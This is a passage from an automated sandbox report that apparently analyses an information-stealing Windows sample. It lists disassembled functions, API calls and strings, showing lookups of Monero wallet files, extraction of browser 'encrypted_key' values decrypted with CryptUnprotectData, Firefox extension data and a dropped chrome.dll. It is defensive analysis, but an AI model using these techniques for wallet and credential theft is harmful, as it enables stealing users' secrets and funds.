                                  • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                  • API String ID: 1029625771-1545816527
                                  • Opcode ID: a5250cb04553578ae89b4c7fd84d4a1bc320f3abf882112faa9e9352a8b8ca35
                                  • Instruction ID: 2e404eca576058fa22677e85ae41f4e63cb30b544f00fb2b89bd82fba61ce850
                                  • Opcode Fuzzy Hash: a5250cb04553578ae89b4c7fd84d4a1bc320f3abf882112faa9e9352a8b8ca35
                                  • Instruction Fuzzy Hash: 63F062F8985304AFDB38BB60E988B61B258A307740F002578E019B71CCC6B498C4DB12
                                  Function 00E78EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00E796AE,00000000), ref: 00E78EEB
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E78EF2
                                  • wsprintfW.USER32 ref: 00E78F08
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: 7249c4839d1ef7a1fdc1491fadd00847cd1df903587e2939abc8c85ea42feda2
                                  • Instruction ID: 13d6d0fd9ff9fcf23219f062984b299a4c6de81f0aecb64773d635ae3c3b8dbe
                                  • Opcode Fuzzy Hash: 7249c4839d1ef7a1fdc1491fadd00847cd1df903587e2939abc8c85ea42feda2
                                  • Instruction Fuzzy Hash: CBE0ECB5A44309BBDB28DBD4DD0AE6D77B8EB05701F0001A4FD0997384DA719E50DB91
                                  Function 00E6A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E78CF0: GetSystemTime.KERNEL32(00E80E1B,0173A010,00E805B6,?,?,00E613F9,?,0000001A,00E80E1B,00000000,?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E78D16
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E6AA11
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 00E6AB2F
                                  • lstrlen.KERNEL32(00000000), ref: 00E6ADEC
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E6AE73
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: d7028944152588137a77366d0e5d115e746c823b545bb15b41d7f98644e59d26
                                  • Instruction ID: 3b7d44de3dedaae0f8e0af722eda0acc02359001beb618755fd8bb4e3a6064be
                                  • Opcode Fuzzy Hash: d7028944152588137a77366d0e5d115e746c823b545bb15b41d7f98644e59d26
                                  • Instruction Fuzzy Hash: 4AE1E3729101089BCB15FBA4DDA2EEEB37DAF54300F54D5B9F11A72095EF306A48CB62
                                  Function 00E6D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E78CF0: GetSystemTime.KERNEL32(00E80E1B,0173A010,00E805B6,?,?,00E613F9,?,0000001A,00E80E1B,00000000,?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E78D16
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E6D581
                                  • lstrlen.KERNEL32(00000000), ref: 00E6D798
                                  • lstrlen.KERNEL32(00000000), ref: 00E6D7AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E6D82B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: a568c0ab77a1f0726ff345b871ad7dbe130ea7dff7f97e87fb10ec78099bfcb5
                                  • Instruction ID: f2334f906c01bd9d1ab264ce581eeb6d819c39955828dc8988924d1c300d5f15
                                  • Opcode Fuzzy Hash: a568c0ab77a1f0726ff345b871ad7dbe130ea7dff7f97e87fb10ec78099bfcb5
                                  • Instruction Fuzzy Hash: B39108729101089BCB15FBA4DC62DEE73B9AF94300F54D579F11A76095EF306A48CB62
                                  Function 00E6D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E78CF0: GetSystemTime.KERNEL32(00E80E1B,0173A010,00E805B6,?,?,00E613F9,?,0000001A,00E80E1B,00000000,?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E78D16
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E6D901
                                  • lstrlen.KERNEL32(00000000), ref: 00E6DA9F
                                  • lstrlen.KERNEL32(00000000), ref: 00E6DAB3
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E6DB32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: e62697ade43560916cbca16da24bfaee8575d981b1078c6ce85c6cac0d0d8384
                                  • Instruction ID: dd1eef97514c961d146b648bc9ece0eed24e68c1c8446e109cd8aaf140741c8f
                                  • Opcode Fuzzy Hash: e62697ade43560916cbca16da24bfaee8575d981b1078c6ce85c6cac0d0d8384
                                  • Instruction Fuzzy Hash: 73811772910108ABCB14FBA4DCA6DEE73BDAF94304F549578F11A76095EF306A48CB72
                                  Function 00EDFED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                  • Instruction ID: 6fb1a6e2bdd8bd4985b097abb5455dadc68d10cfc956ed08ed2cd025476e39d5
                                  • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                  • Instruction Fuzzy Hash: A351E47260024AAFEB29CF55C841BBA73A5FF01304F24692EE80677791E771ED82D790
                                  Function 00E6A560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00E6A664
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: @$v10$v20
                                  • API String ID: 2746078483-278772428
                                  • Opcode ID: 19c41a8f4c43122e7e95cc3046645390edb694dac9bd410fdabef0f8555751f7
                                  • Instruction ID: 95ad270ecddd4e8fba203195223dd896bf4d26b0141fa68b4d1ea46e2832e2a0
                                  • Opcode Fuzzy Hash: 19c41a8f4c43122e7e95cc3046645390edb694dac9bd410fdabef0f8555751f7
                                  • Instruction Fuzzy Hash: 0D513D70A50208EFDB24EFA4DD96FED77B5AF40344F08A128E90E7B191EB706A05CB51
                                  Function 00E6F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E6A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E6A13C
                                    • Part of subcall function 00E6A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E6A161
                                    • Part of subcall function 00E6A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E6A181
                                    • Part of subcall function 00E6A110: ReadFile.KERNEL32(000000FF,?,00000000,00E6148F,00000000), ref: 00E6A1AA
                                    • Part of subcall function 00E6A110: LocalFree.KERNEL32(00E6148F), ref: 00E6A1E0
                                    • Part of subcall function 00E6A110: CloseHandle.KERNEL32(000000FF), ref: 00E6A1EA
                                    • Part of subcall function 00E78FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E78FE2
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00E81678,00E80D93), ref: 00E6F64C
                                  • lstrlen.KERNEL32(00000000), ref: 00E6F66B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: 5509aa2dec4bd4d71fc697441bfbb952f202261660514db14aa67b825d2efdb5
                                  • Instruction ID: 1f4ca789bd936f2563581945b71d3e6b299dc396c7d22e1a740cc0c0d6dc01de
                                  • Opcode Fuzzy Hash: 5509aa2dec4bd4d71fc697441bfbb952f202261660514db14aa67b825d2efdb5
                                  • Instruction Fuzzy Hash: 8F511072D101089BCB04FBA4EDA6DED73B9AF94340F58D578F41A77191EE346A08CB62
                                  Function 00E737B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 2d895b704595e2d24c22abe78edccf995174d487d4e2cb7233c9442289fca487
                                  • Instruction ID: 89087e1a425851b129d56feba495abaa67a54de387f3893000568110aa74a825
                                  • Opcode Fuzzy Hash: 2d895b704595e2d24c22abe78edccf995174d487d4e2cb7233c9442289fca487
                                  • Instruction Fuzzy Hash: 83416371D002099FDB54EFB4D955AEEB7B8AF44304F04D028F51A77185EB709A48DF91
                                  Function 00E6A430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E6A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E6A13C
                                    • Part of subcall function 00E6A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E6A161
                                    • Part of subcall function 00E6A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E6A181
                                    • Part of subcall function 00E6A110: ReadFile.KERNEL32(000000FF,?,00000000,00E6148F,00000000), ref: 00E6A1AA
                                    • Part of subcall function 00E6A110: LocalFree.KERNEL32(00E6148F), ref: 00E6A1E0
                                    • Part of subcall function 00E6A110: CloseHandle.KERNEL32(000000FF), ref: 00E6A1EA
                                    • Part of subcall function 00E78FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E78FE2
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E6A489
                                    • Part of subcall function 00E6A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E6A23F
                                    • Part of subcall function 00E6A210: LocalAlloc.KERNEL32(00000040,?,?,?,00E64F3E,00000000,?), ref: 00E6A251
                                    • Part of subcall function 00E6A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E6A27A
                                    • Part of subcall function 00E6A210: LocalFree.KERNEL32(?,?,?,?,00E64F3E,00000000,?), ref: 00E6A28F
                                    • Part of subcall function 00E6A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E6A2D4
